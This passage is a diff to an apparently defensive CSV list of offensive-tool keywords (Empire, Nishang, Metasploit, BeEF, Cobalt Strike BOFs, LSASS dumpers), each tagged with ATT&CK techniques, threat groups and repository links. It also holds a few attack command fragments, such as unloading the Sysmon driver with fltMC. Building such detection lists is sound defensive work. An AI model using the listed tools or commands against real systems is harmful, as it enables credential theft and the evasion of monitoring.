- T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-WMILocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FireBuster.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*fireeye*commando*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" "*FireFart*dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "*firefox/FakeUpdate_files/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*firefox_decrypt.py*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" -"*firefox_decrypt-main*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" -"*firefox_extension_bindshell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*firefox_extension_reverse_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*firefox_privilege_escalation.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*firefox_privilege_escalation_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*firefox_smil_uaf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*FireListener.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*firefox_decrypt.py*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*firefox_decrypt-main*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*firefox_extension_bindshell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*firefox_extension_reverse_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*firefox_privilege_escalation.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*firefox_privilege_escalation_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*firefox_smil_uaf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FireListener.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Firesheep/*","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Firewall_Walker_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*fishing_with_hollowing*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" @@ -10373,7 +10524,7 @@ "*Flangvik/NetLoader*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*Flangvik/SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*flashupdate.ps1*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*florylsk/NtRemoteLoad*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*florylsk/NtRemoteLoad*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*fltMC* unload SysmonDrv*","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*FluxionNetwork*","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","10","4340","1377","2023-08-30T20:11:16Z","2017-04-29T10:22:27Z" "*fodhelperbypass*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -10384,15 +10535,15 @@ "*Follina/Follinadoc*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*for /f %%i in (C:\Windows\IME\ok.txt)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*for /r c:\windows\system32\ %i in (*sht*.exe)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*-force-forwardableet-ADComputer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*-force-forwardableet-ADComputer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*foreign_access.cna*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass * *","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.c*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x64*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" 